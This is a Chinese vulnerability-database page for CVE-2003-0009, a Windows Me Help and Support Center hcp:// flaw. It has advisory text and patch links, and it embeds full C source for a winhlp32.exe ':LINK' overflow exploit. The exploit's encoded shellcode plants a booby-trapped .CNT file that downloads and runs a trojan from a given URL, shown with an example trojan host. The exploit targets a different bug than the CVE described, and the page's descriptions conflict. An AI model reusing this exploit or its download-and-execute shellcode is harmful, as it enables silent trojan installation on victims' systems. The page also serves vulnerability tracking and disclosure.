CVE-2003-0009
CVSS6.8
发布时间 :2003-03-07 00:00:00
修订时间 :2016-10-17 22:28:15
NMCOES    

[原文]Cross-site scripting (XSS) vulnerability in Help and Support Center for Microsoft Windows Me allows remote attackers to execute arbitrary script in the Local Computer security context via an hcp:// URL with the malicious script in the topic parameter.


[CNNVD]Microsoft Windows帮助和支持中心缓冲区溢出漏洞(MS03-006)(CNNVD-200303-044)

        
        帮助和支持中心可以提供用户集中化服务和帮助,如提供产品文档,判断硬件兼容性帮助,访问Windows更新,Microsoft在线帮助等。用户和程序可以通过使用"hcp://"前缀执行URI链接来访问帮助和支持中心。
        Windows ME版本的帮助和支持中心由于"hcp://" URL处理程序对缓冲区边界缺少正确检查,远程攻击者可以利用这个漏洞可能以用户进程权限在系统上执行任意指令。
        攻击者可以通过构建恶意URL来利用这个楼,当用户点击后,可以以本地计算机安全上下文执行任意代码。URL可以构建在WEB页面上,或者直接通过EMAIL发送给用户,当用户点击URL的时候,可造成攻击者有能力读或启动本地系统上的文件。在通过EMAIL攻击的情况下,如果用户使用默认配置的Outlook Express 6.0和Outlook 2002,或者使用了Outlook email安全更新(Outlook Email Security Update)( http://office.microsoft.com/Downloads/2000/Out2ksec.aspx )的Outlook 98或2000,攻击者就不能让用户读取邮件的时候自动执行,需要用户点击URL。否则的话,攻击者可以在用户不需要点击URL的情况下自动执行恶意代码。
        

- CVSS (基础分值)

CVSS分值: 6.8 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/o:microsoft:windows_xp::gold:professionalMicrosoft Windows XP Professional Gold
cpe:/o:microsoft:windows_meMicrosoft Windows ME
cpe:/o:microsoft:windows_xp:::home

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0009
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0009
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200303-044
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=104636383018686&w=2
(UNKNOWN)  BUGTRAQ  20030227 MS-Windows ME IE/Outlook/HelpCenter critical vulnerability
http://www.ciac.org/ciac/bulletins/n-047.shtml
(UNKNOWN)  CIAC  N-047
http://www.iss.net/security_center/static/11425.php
(VENDOR_ADVISORY)  XF  winme-hsc-hcp-bo(11425)
http://www.kb.cert.org/vuls/id/489721
(UNKNOWN)  CERT-VN  VU#489721
http://www.microsoft.com/technet/security/bulletin/ms03-006.asp
(VENDOR_ADVISORY)  MS  MS03-006
http://www.securityfocus.com/bid/6966
(VENDOR_ADVISORY)  BID  6966

- 漏洞信息

Microsoft Windows帮助和支持中心缓冲区溢出漏洞(MS03-006)
中危 边界条件错误
2003-03-07 00:00:00 2005-05-13 00:00:00
远程  
        
        帮助和支持中心可以提供用户集中化服务和帮助,如提供产品文档,判断硬件兼容性帮助,访问Windows更新,Microsoft在线帮助等。用户和程序可以通过使用"hcp://"前缀执行URI链接来访问帮助和支持中心。
        Windows ME版本的帮助和支持中心由于"hcp://" URL处理程序对缓冲区边界缺少正确检查,远程攻击者可以利用这个漏洞可能以用户进程权限在系统上执行任意指令。
        攻击者可以通过构建恶意URL来利用这个楼,当用户点击后,可以以本地计算机安全上下文执行任意代码。URL可以构建在WEB页面上,或者直接通过EMAIL发送给用户,当用户点击URL的时候,可造成攻击者有能力读或启动本地系统上的文件。在通过EMAIL攻击的情况下,如果用户使用默认配置的Outlook Express 6.0和Outlook 2002,或者使用了Outlook email安全更新(Outlook Email Security Update)( http://office.microsoft.com/Downloads/2000/Out2ksec.aspx )的Outlook 98或2000,攻击者就不能让用户读取邮件的时候自动执行,需要用户点击URL。否则的话,攻击者可以在用户不需要点击URL的情况下自动执行恶意代码。
        

- 公告与补丁

        厂商补丁:
        Microsoft
        ---------
        Microsoft已经为此发布了一个安全公告(MS03-006)以及相应补丁:
        MS03-006:Flaw in Windows Me Help and Support Center Could Enable Code Execution (812709)
        链接:
        http://www.microsoft.com/technet/security/bulletin/MS03-006.asp

        使用Windows自动更新:
        * Microsoft Windows Me:
        
        http://windowsupdate.microsoft.com

- 漏洞信息 (22289)

Microsoft Windows XP/ME Help and Support Center Buffer Overflow Vulnerability (EDBID:22289)
windows remote
2003-02-26 Verified
0 s0h
N/A [点击下载]
source: http://www.securityfocus.com/bid/6966/info

The Microsoft Windows ME Help and Support Center is prone to a buffer overflow. This is due to insufficient bounds checking on input supplied through the HCP URI parameter.

An attacker can exploit this vulnerability by making a HCP request with an overly long string. This will trigger the overflow condition and may result in malicious attacker-supplied code being executed on the vulnerable system.

A similar vulnerability was reported in the Windows XP Help and Support Center (BID 6802). These vulnerabilities may be related.

** Conflicting details have been reported about this vulnerability. The discoverer claims that the issue is cross site scripting that allows script code emebedded into the HCP URL to be executed. The discoverer also claims that Windows XP without SP1 is also vulnerable to this issue, while Microsoft claims that it is not.

/*************************************************
 * s0h - Skin Of Humanity.
 * http://s0h.cc
 *
 * Title : Win32hlp exploit for : ":LINK overflow"
 * Date : Sunday, 9 March, 2003 1:00 AM 
 *
 * -----------------------------------------------
 *  
 * Archive : http://s0h.cc/exploit/s0h_Win32hlp.c
 * Binary : http://s0h.cc/exploit/s0h_Win32hlp.exe
 * 
 * -----------------------------------------------
 * Discovered by ThreaT <threat@s0h.cc>.
 * Coded by ThreaT <threat@s0h.cc>
 * Hompage : http://s0h.cc/~threat/
 * 
 * Winhlp32.exe exploit for ':LINK' overflow !
 * 
 * -----------------------------------------------
 *
 * This exploit can trap a .CNT file (file with .-
 * HLP files) with the arbitrary code who can dow-
 * nload and execute a trojan without user ask.
 *
 * -----------------------------------------------
 * 
 * Compiling : cl /nologo s0h_Win32hlp.c
 * Usage : s0h_Win32hlp.exe <trojan> <CNT file> [offset]
 * Eq : C:\>s0h_Win32hlp.exe http://www.chez.com/mvm/trojan.exe c:\WINNT\Help\mplayer2.cnt 4
 * 
 * <trojan> = host to download the trojan (http:/-
 * /blah.plof/trojan.exe).
 * 
 * <CNT file> = The CNT file.
 * 
 * [offset] = Optionnal. This one defined a numbe-
 * r between 0 and 15 that can play with the retu-
 * rn address. Generaly, you must used 4 if the .-
 * HLP file is called by an application.
 * 
 * -----------------------------------------------
 * This exploit was tested on :
 * 	- Windows 2000 PRO/SERVER (fr) SP0
 * 	- Windows 2000 PRO/SERVER (fr) SP1
 *	- Windows 2000 PRO/SERVER (fr) SP2
 *
 ************************************************/


#include <windows.h>

#define taille	270
#define VulnLen	650

int main (int argc, char *argv[]) {

	HANDLE ExploitFile;
	DWORD lpNumberOfBytesWritten, lpFileSizeHigh, FileSize;

	int i,j, len, RetByte=0xE5;

	char *file, *url;

unsigned char *Shellcode, *buffer,

RealGenericShellcode[] = 
"\x68\x5E\x56\xC3\x90\x8B\xCC\xFF\xD1\x83\xC6\x0E\x90\x8B\xFE\xAC"
"\x34\x99\xAA\x84\xC0\x75\xF8"

"\x72\xeb\xf3\xa9\xc2\xfd\x12\x9a\x12\xd9\x95\x12\xd1\x95\x12\x58\x12\xc5\xbd\x91"
"\x12\xe9\xa9\x9a\xed\xbd\x9d\xa1\x87\xec\xd5\x12\xd9\x81\x12\xc1\xa5\x9a\x41\x12"
"\xc2\xe1\x9a\x41\x12\xea\x85\x9a\x69\xcf\x12\xea\xbd\x9a\x69\xcf\x12\xca\xb9\x9a"
"\x49\x12\xc2\x81\xd2\x12\xad\x03\x9a\x69\x9a\xed\xbd\x8d\x12\xaf\xa2\xed\xbd\x81"
"\xed\x93\xd2\xba\x42\xec\x73\xc1\xc1\xaa\x59\x5a\xc6\xaa\x50\xff\x12\x95\xc6\xc6"
"\x12\xa5\x16\x14\x9d\x9e\x5a\x12\x81\x12\x5a\xa2\x58\xec\x04\x5a\x72\xe5\xaa\x42"
"\xf1\xe0\xdc\xe1\xd8\xf3\x93\xf3\xd2\xca\x71\xe2\x66\x66\x66\xaa\x50\xc8\xf1\xec"
"\xeb\xf5\xf4\xff\x5e\xdd\xbd\x9d\xf6\xf7\x12\x75\xc8\xc8\xcc\x66\x49\xf1\xf0\xf5"
"\xfc\xd8\xf3\x97\xf3\xeb\xf3\x9b\x71\xcc\x66\x66\x66\xaa\x42\xca\xf1\xf8\xb7\xfc"
"\xe1\x5f\xdd\xbd\x9d\xfc\x12\x55\xca\xca\xc8\x66\xec\x81\xca\x66\x49\xaa\x42\xf1"
"\xf0\xf7\xdc\xe1\xf3\x98\xf3\xd2\xca\x71\xb5\x66\x66\x66\x14\xd5\xbd\x89\xf3\x98"
"\xc8\x66\x49\xaa\x42\xf1\xe1\xf0\xed\xc9\xf3\x98\xf3\xd2\xca\x71\x8b\x66\x66\x66"
"\x66\x49\x71\xe6\x66\x66\x66";


printf (" * ***************************************************** *\n"
	" *                 s0h - Skin of humanity                *\n"
	" *                    http://s0h.cc/                     *\n"
	" * ***************************************************** *\n"
	"     Win32hlp exploit for : \":LINK overflow\"           *\n"
	" * ***************************************************** *\n"
	" * Discovered by ThreaT <threat@s0h.cc>.                 *\n"
	" * Coded by ThreaT <threat@s0h.cc>                       *\n"
	" * Hompage : http://s0h.cc/~threat/                      *\n" 
	" * Archive : http://s0h.cc/exploit/s0h_Win32hlp.c        *\n"
	" * ***************************************************** *\n"
	);

if (argc < 3)
{
	printf(
		" * ***************************************************** *\n"
		" * Usage : s0h_Win32hlp.exe <trojan> <CNT file> [offset] *\n"
		" *                                                       *\n"
		" * <trojan> = host to download the trojan (http:/-       *\n"
		" * /blah.plof/trojan.exe).                               *\n"
		" *                                                       *\n"
		" * <CNT file> = The CNT file.                            *\n"
		" *                                                       *\n"
		" * [offset] = Optionnal. This one defined a number betw- *\n"
		" * een 0 and 15 that can play with the return address. - *\n"
		" * Generaly, you must used 4 if the .HLP file is called  *\n"
		" * by an application.                                    *\n"
		" * ***************************************************** *\n"	
	);

	ExitProcess (1);
}

if (argv[3]) RetByte = atoi (argv[3]) + 0xE0;

len = taille + strlen (argv[1]) + 2 + 4;
url = (char *) malloc (strlen (argv[1]));
strcpy (url, argv[1]);

/*
* Create the final shellcode
*/

Shellcode = (unsigned char *) malloc (len);

// encrypt the URL
for (i=0;i<strlen (argv[1]); argv[1][i++]^=0x99);

// inject the RealGenericShellcode in the shellcode buffer
for (i=0;i<taille; Shellcode[i]=RealGenericShellcode[i++]);

// append crypted URL to the shellcode buffer
for (i,j=0;i<len - 1;Shellcode[i++]=argv[1][j++]);


Shellcode[len-6]=0x99; // URL delimitation
Shellcode[len-5]=0x2E; // fuck the winhlp32.exe parser

// append the RET ADDR
// Play with this bytes if the xploit don't work
Shellcode[len-4]=0x30;
Shellcode[len-3]=RetByte;
Shellcode[len-2]=0x06;
Shellcode[len-1]=0x00;


/*  Now, we make a vuln string for our exploit */

buffer = (unsigned char *) malloc (VulnLen);
memset (buffer,0,VulnLen);

lstrcpy (buffer,":Link ");
for (i=6; i < VulnLen - len; buffer[i++] = (char)0x90);
for (i,j=0; i < VulnLen; buffer[i++] = Shellcode[j++]);


/* Trap the CNT file specified with the vuln string */

ExploitFile = CreateFile (argv[2],GENERIC_READ+GENERIC_WRITE,
			  FILE_SHARE_READ+FILE_SHARE_WRITE,NULL,
			  OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);

if ( ExploitFile == INVALID_HANDLE_VALUE) {
	printf ("Error : cannot open cnt file '%s'\n",argv[2]);
	ExitProcess (1);
}

	FileSize = GetFileSize(ExploitFile, &lpFileSizeHigh);
	FileSize += lpFileSizeHigh*MAXDWORD;

	file = (char *)LocalAlloc (LPTR, FileSize + 2);
	file[0] = 0x0d;
	file[1] = 0x0a;
	file += 2;


	ReadFile(ExploitFile,file,FileSize,&lpNumberOfBytesWritten,NULL);
	
	SetFilePointer (ExploitFile,0,NULL,FILE_BEGIN);
	WriteFile (ExploitFile,buffer,VulnLen,&lpNumberOfBytesWritten,NULL);
	
	file -= 2;
	WriteFile (ExploitFile,file,FileSize+2,&lpNumberOfBytesWritten,NULL);
	
	CloseHandle(ExploitFile);
	
        printf (
		" * *******************************************************\n"
		" * The file is now traped and ready to download and exe- *\n"
		" * cute :                                                *\n"
		" * File : %s\n"
		" * At : %s\n"
		" * *******************************************************\n"
		,argv[2],url);
		
		if (RetByte != 0xE5)
			printf (
				" * *******************************************************\n"
				" * You have specified this address : 0x0006%x30          *\n"
				" * The abitrary will loaded since an application.        *\n"
				" * *******************************************************\n"
				,RetByte);
			

	return 0;
}


		

- 漏洞信息

6074
Microsoft Windows Me HSC hcp:// URL XSS
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Unknown

- 漏洞描述

Windows Me contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate hcp:// URLs. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

- 时间线

2003-02-26 2003-02-26
2003-02-26 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

Microsoft Windows Help and Support Center Buffer Overflow Vulnerability
Boundary Condition Error 6966
Yes No
2003-02-26 12:00:00 2009-07-11 08:06:00
Discovery of this vulnerability credited to Warning and Fozzy.

- 受影响的程序版本

Microsoft Windows XP Professional
Microsoft Windows XP Home
Microsoft Windows XP 64-bit Edition
Microsoft Windows ME
Microsoft Windows XP Professional SP1
Microsoft Windows XP Home SP1
Microsoft Windows XP 64-bit Edition SP1

- 不受影响的程序版本

Microsoft Windows XP Professional SP1
Microsoft Windows XP Home SP1
Microsoft Windows XP 64-bit Edition SP1

- 漏洞讨论

The Microsoft Windows ME Help and Support Center is prone to a buffer overflow. This is due to insufficient bounds checking on input supplied through the HCP URI parameter.

An attacker can exploit this vulnerability by making a HCP request with an overly long string. This will trigger the overflow condition and may result in malicious attacker-supplied code being executed on the vulnerable system.

A similar vulnerability was reported in the Windows XP Help and Support Center (BID 6802). These vulnerabilities may be related.

** Conflicting details have been reported about this vulnerability. The discoverer claims that the issue is cross site scripting that allows script code emebedded into the HCP URL to be executed. The discoverer also claims that Windows XP without SP1 is also vulnerable to this issue, while Microsoft claims that it is not.

- 漏洞利用

An exploit exists for this vulnerability.

- 解决方案

Users are advised to obtain patches via Windows Update.

This issue was reportedly repaired for Windows XP as part of the fix provided in MS02-060 (also included in Windows XP Service Pack 1).


Microsoft Windows XP Home

Microsoft Windows XP Professional

Microsoft Windows XP 64-bit Edition

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站